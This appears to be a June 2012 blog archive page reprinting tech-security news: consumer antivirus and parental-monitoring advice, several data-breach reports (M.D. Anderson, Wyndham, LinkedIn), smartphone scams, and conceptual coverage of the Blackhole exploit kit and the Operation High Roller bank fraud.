Archive for June, 2012
Article source: http://www.cio-today.com/story.xhtml?story_id=12300C5ITB1F
Q: I’ve been using Norton for my anti-virus and have no complaints, no viruses. The time to renew the subscription is coming up and, maybe like a lot of people, I’m looking to cut expenses. Is it possible to duplicate the performance of Norton with a free program? — Gary Adams
A: There are a lot of excellent free programs. I can’t evaluate Norton and all of the free ones in a precise enough way to accurately rank the performance of each one. But I have used them all, including Norton, long enough to tell you that all work just fine. If you’re looking for a free anti-virus program I can easily recommend AVG. Here’s a link to the download: http://free.avg.com/us-en/homepage. You’ll see two programs on that page. One is a free trial; the other is completely free. This is, by no means, the only worthwhile free anti-virus program but it is one of the good ones. Another that I increasingly like is Microsoft’s Security Essentials. You can download that program at http://windows.microsoft.com/en-US/windows/products/security-essentials.
Q: Our daughter is 14. We would like to find a program that lets us monitor what she does online. There is no problem that we see. It seems like the right thing to do with all the dangers and horror stories. — Betsy Walter
A: Truth? I don’t think a monitoring program for a teenager does much good and it may do harm by giving parents a false sense of security. There are so many places where a teenager can get online that monitoring the home computer leaves a lot of other doors wide open. And, ironically, kids who are taking chances or being reckless online may be cautious about using the home computer for that activity. If teenagers somehow discover that you are monitoring them that may drive their activities underground and make things worse. The best thing to do is to talk to your child about online dangers and help her understand the problems that can result. However, if you disagree and want to find a monitoring program then I’d suggest one of the oldest in the category, Net Nanny (http://www.netnanny.com).
Bill Husted writes about technology. Contact him at [email protected]
Rockefeller’s provision would require the US Securities and Exchange Commission (SEC) to make explicit when a company must disclose data breaches and spell out steps they are taking to protect their systems from data breaches, according to a report by the Associated Press.
In October, the SEC issued guidelines, not mandates, instructing companies to disclose data breaches – as well as the risks of potential breaches – in their financial statements.
The SEC said that companies should disclose a data breach and the risk of cyber incidents “if these issues are among the most significant factors that make an investment in the company speculative or risky.”
Few companies, however, have actually followed the SEC guidelines, as demonstrated by some recent data breaches that have come to light months or years after they occurred.
For example, the recently disclosed data breach at Wyndham hotels, in which hackers broke in and stole credit card information three times over a two-year period, was not reported by the company in its filings with the SEC, according to the AP report.
In addition, Amazon did not disclose in its 2011 annual report the theft of personal data on 24 million customers at its Zappos online shoe retailer, the report noted.
On Thursday, the University of Texas M.D. Anderson Cancer Center began notifying patients that an unencrypted laptop computer containing patient data was stolen in April, the Houston Business Journal reports.
Dan Fontaine — M.D. Anderson senior vice president for business affairs — said that the laptop was stolen from a physician’s home on April 30.
He said it contained data on nearly 30,000 patients (Pulsinelli, Houston Business Journal, 6/28).
According to an M.D. Anderson release, data on the computer included:
- Medical record numbers;
- Patient names;
- Social Security numbers; and
- Treatment and research information (LaFave Grace, Modern Healthcare, 6/28).
Fontaine said that the data were not consistent among all patients (Houston Business Journal, 6/28).
He said, “We have no reason to believe that the computer was stolen for the information it contained” (Berger, Houston Chronicle, 6/28).
Response From Center
A spokesperson for the center said notification letters began going out Thursday to potentially affected patients.
In addition, M.D. Anderson said that a criminal investigation is ongoing and that it is working with law enforcement officials to recover the laptop (Modern Healthcare, 6/28).
Fontaine said M.D. Anderson is offering no-cost credit monitoring services to patients whose Social Security numbers were on the laptop.
Meanwhile, M.D. Anderson said it has boosted efforts to encrypt its devices (Houston Business Journal, 6/28).
- Sign in or register to share your thoughts on this article.
Readers are also invited to send feedback to: [email protected]
(click to enlarge)
Kurt Batdorf, Editor
Thursday, June 28, 2012
Scams and viruses will target your smartphone next
With more than 100 million smartphone users in America today, it should come as no surprise that the number of scams and viruses targeting these devices is growing every day. One report out of Japan cites an increase of more than 150 percent in attacks on the popular Android operating system, which powers more than half the smartphones in the U.S. While not as popular with hackers, Apple’s iPhone and the Windows smartphone are vulnerable as well.
The power of the smartphone is what makes it such a tempting target for hackers. The phone’s ability to run programs (apps) and the ease with which these apps can be written and distributed make them lucrative targets.
A typical scenario is for a hacker to create an app for a popular function such as a video player or photo editor. Embedded in this app is a snippet of code that takes control of a smartphone function such as texting. Once the app launches, it starts sending text messages to premium addresses (often set up by the creators of the virus). The phone can also be made to dial offshore pay-per-call numbers. The smartphone owner is often unaware his phone is infected until his bill arrives. Removing these charges can be very difficult.
Applications are getting closer scrutiny from distributors such as Apple’s App Store and Google’s Play Store (formerly the Google Market Place), so hackers are adapting by releasing a clean app, then sending the malware inside an update.
Smartphone hackers are also using the same tactics as their PC-hacking counterparts. Beware the unexpected email or text message. Especially if the message promises big rewards. This scam typically starts off with a message that tells you you’ve won a gift card. All you need to do is reply to claim your prize. This reply alone may be to a premium address and incur a charge. Or it may subscribe you to a monthly service (a practice called “cramming”). Mobile carriers are getting wise to this, and are more than willing to help you block these kinds of charges — for a monthly fee.
As I said, these gift card “opportunities” also pop up on home computers as well. One of the first things you’re required to do in order to claim your card is to provide a valid cellphone number. This requirement should raise an immediate red flag. After you’ve given up this information, you’re taken through a series of offers requiring you to provide personal information, subscribe to services and purchase products. Failure to do comply disqualifies you from receiving the gift card.
So how do you protect yourself and your phone from this new malware threat? Obviously, ignoring suspect messages is a great start, but the hackers are getting smarter. You should only download apps from your device’s approved store. While that’s not infallible, most approved apps are clean.
Thankfully, the good guys are staying a step ahead. Most popular PC anti-virus makers are now offering protection for mobile devices as well. These programs screen text messages and scan for potential viruses. Many offer additional features such as tracking a lost or stolen phone with GPS and the ability to erase your phone’s memory via the Internet.
Not all anti-virus providers protect all operating systems, but there is something out there for everyone. Prices range from free to $30 per year. Your best bet is to log in to your device’s app store and search for “anti-virus.” Downloading an app from anywhere other than your device’s approved website can leave you open to potential infection. In fact, in researching this article, all the reputable anti-virus vendors redirected me to the Google Play store on my Android device.
For more information, view informative videos on our YouTube channel (youtube.com/user/byteslaves). You can also send questions or story ideas to [email protected] or post to our Facebook page, facebook.com/byteslavescomputing.
Hotel chain Wyndham Worldwide Corp. has been sued by the U.S. Federal Trade Commission (FTC) for data breaches, which allegedly caused millions of dollars in customer losses.
The lawsuit, filed this week, was targeted toward Wyndham and three of its subsidiary companies.
After one security breach in 2008, according to the FTC, Wyndham failed to protect customers’ personal data. As a result, two more data breaches occurred in 2008 and 2009 causing confidential information from more than 500,000 customer payment cards to be stolen.
The stolen customer information was then sent to domain names registered in Russia, the FTC said.
In a lawsuit filed in the federal court in Arizona, the FTC said that more than $10.6 million in fraudulent charges were attributed to the cards of affected Wyndham customers.
The FTC said that each Wyndham location has its own computer systems to store customer data, in many cases including credit card numbers, expiration dates, and security codes.
Publicly traded Wyndham, based in Parsippany, N.J., licenses hotels with brand names such as Wyndham Hotels Resorts, Howard Johnson, Days Inn, and Super 8.
This isn’t the first time the federal government has cracked down on companies regarding customer information security. The FTC in 2006 fined ChoicePoint Inc. $10 million related to 163,000 customer accounts that were compromised. That fine was the largest ever issued in the United States related to customer security and privacy.
In a statement, the company said that it is fully cooperating with federal regulators but said that the lawsuit is without merit. It has also made upgrades to its information technology systems.
The Epoch Times publishes in 35 countries and in 19 languages. Subscribe to our e-newsletter.
Exploit kits are adopting a tactic more commonly found in botnet malware to make their attack campaigns more resilient–“pseudo-random domain generation.”
Among the kits being associated with this activity is Blackhole, which has emerged as one of the most prevalent exploit kits in the wild. In a recent report, anti-malware technology company M86 Security said the Blackhole kit was responsible for 95 percent of all the malicious URLs it detected in the second half of 2011. In February, the kit was used to infect whistle-blower site Cryptome.
According to Symantec, Blackhole has now been observed utilizing pseudo-random domain generation to make attacks more persistent. The technique is commonly used by botnets to thwart efforts to disrupt their command and control (CC) operations by generating new domain names for the malware to contact in case the CC server is taken offline.
According to Symantec, Blackhole has now taken a page from botnet operators.
“Although this approach has generally been very successful for malware authors, it has had one weakness,” he added. “If the location or URL for the iframe, which actually contains the malicious code, changes or is taken down, all of the compromised sites will have to be updated to point to this new location. This process is difficult and impractical.”
“Once the domain has been generated and the iframe has been created, the exploit kit page runs many exploits as normal, going to great lengths to determine, for example, which compromised PDF file to show, depending on the version of Adobe Reader installed,” Johnston blogged.
But Blackhole is not the only kit to be utilizing these techniques. A researcher at Stopmalvertising.com found the pseudo-random domain generator in an .ASP file and AC_RunActiveContent.js on an infected website. At first however the malicious code redirected the researcher to the RedKit exploit kit. Later, it redirected to Blackhole. The domain generator comes up with a new one every 12 hours, Stopmalvertising.com found.
“So far we have seen a small but steady stream of compromised domains using this technique,” blogged Johnston. “This suggests that this is perhaps some kind of trial or test that could be expanded in future.”
A group of sophisticated online thieves have modified two popular attack toolkits to help them succeed in a global crimes spree, stealing at least 60 million Euros—about $74 million U.S. dollars—from European and South American banks, security firms McAfee and Guardian Analytics stated in a June 26 report.
The widespread crime network showed that online thieves are increasingly using servers to automate many components of crime, such as providing information on active “money mules”—the people who receive stolen funds and, knowingly or not, launder them—and to automate the fraudulent transactions. The investigation, based on logs from more than 60 such machines, found that the criminals used the Zeus and SpyEye crime toolkits to steal 60 million Euros, but the damages could be much higher. Transactions totaling more than 1 billion Euros were attempted, but could not be confirmed completed, the report stated.
Moving the intelligence of the criminals operation out of the malware and into central servers has helped criminals steal money more efficiently, said David Marcus, director of advanced research and threat intelligence for McAfee. Each server handled an operation against a single financial institution or geographic area.
“If you go back a couple of years, most of the criminals’ nastiness and heavy lifting happened on the end host,” said Marcus. “What became really apparent here is this move to an automated transaction server methodology, and actually the vast percentage of the fraudulent logic to this server that is controlled by the fraudster, is making a difference. The amount of sophistication and how you can target specific individuals and specific financial institutions … was astounding.”
Dubbed “Operation High Roller” by the two firms, the crime ring targeted, in many cases, high net-worth individuals and companies that had more than 250,000 Euros in their accounts. Following the evidence, security researchers at the firms first found victims in Italy, then in Germany and the Netherlands. Digital bread crumbs later led to other operations in South America, where the thieves targeted businesses with more than $500,000 in the bank, and North America, where the thieves targeted 109 companies in the U.S. and Canada.
“We were able to identify the system—the communications between the infected hosts, the automated transaction servers and the command-and-controls servers,” said Marcus. “The ones in Europe left the attack data exposed … but the ones in America were locked down.”
One of the two big advances demonstrated by the network is the increasing sophisticated criminal logic placed on servers that help automate fraudulent transactions. In the past, online thieves would be notified when the victim had logged into their bank account, and each theft of funds would have to be made manually.
Earlier in June, security firm Trend Micro identified the automated component, which it called an “automated transaction system” or ATS, as a threat to financial institutions. The investigation by McAfee and Guardian Analytics show how that advance can be used to great effect.
In addition, the High Roller attack showed the criminals were getting better at hiding their activity on the victim’s computer. Typically, a victim would log into their bank account, provide their code from a two-factor authentication token, and then see a “You are being logged in” message. Behind the scenes, however, the thieves were making a large transaction.
“From the bank’s perspective, I just logged in, provided my credentials and made a transfer—that doesn’t look fraudulent,” said Marcus. “Without giving the bad guys too much credit, that’s pretty clever.”
* Ireland’s regulator says tech giants respond to requests
* LinkedIn says key exec moves to Dublin HQ privacy team
* Watchdog to return to Facebook offices in July
* LinkedIn under investigation for data breach
* Regulator bucks trend in Ireland, to boost staff numbers
By Lorraine Turner
DUBLIN, June 28 (Reuters) – Technology groups Facebook
and LinkedIn have agreed to beef up their
international privacy and compliance teams in response to
demands from the Irish regulator, the deputy Data Protection
Commissioner told Reuters.
Recent high-profile data lapses, such as LinkedIn’s security
breach that exposed millions of user passwords, have highlighted
the difficulties for web giants and regulators alike of
protecting consumer data.
Some of the world’s major tech players, including Google
, have moved to set up their international or European
headquarters in business-friendly Ireland in recent years.
Facebook’s Ireland office, with approximately 400 employees,
handles all its users outside the United States and Canada. The
group has over 900 million users, most of them outside of North
Facebook, the world’s largest social network, agreed at the
end of December to overhaul privacy protection for users outside
North America after the Irish regulator found its policies were
overly complex and lacked transparency.
“They’re beefing up their privacy functions in Ireland by
bringing in people who’ve taken a lead in the U.S.,” Gary
Davies, Deputy Data Protection Commissioner (DPC), told Reuters.
LinkedIn, an employment and professional networking site
with more than 160 million members, said it is bulking out its
privacy team, with the appointment of a key executive at its
“We are putting additional privacy resources in Ireland and
moving one of our key directors to our International HQ in
Dublin,” a spokeswoman at LinkedIn told Reuters via email.
Davies confirmed that the DPC is currently investigating the
LinkedIn security breach.
The Irish regulator will revisit Facebook’s offices on July
10 to re-audit and will publish its report in September or
October, said Davies.
Facebook, whose shares slid after its recent $16 billion
IPO, said it had agreed to a six-month progress review in July.
“Facebook has cooperated with the DPC throughout the review
process and we look forward to updating them fully over the
coming weeks,” a spokesman at Facebook said, declining to
comment on the enlargement of its privacy team.
Data protection laws are under review in Europe amid rapid
change in how people use the Internet and as services such as
cloud computing – allowing data to be stored on distant servers
to be accessed anywhere – become mainstream for business.
Google was scheduled to meet with France’s data protection
watchdog in June to answer questions about its new user privacy
policy as part of a Europe-wide investigation being led by the
As most large U.S. tech companies have a substantial or lead
European presence in Ireland, other tech companies such as Apple
, Microsoft, and Twitter can also be expected
to be examining designating Ireland as their European data
protection regulator, said Davies.
The number of investigations opened by the Irish regulator
in 2011 was double what it had been five years previously.
LinkedIn will be subject to a routine audit over the next 12
months to check compliance with European Union data protection
law, said Davies.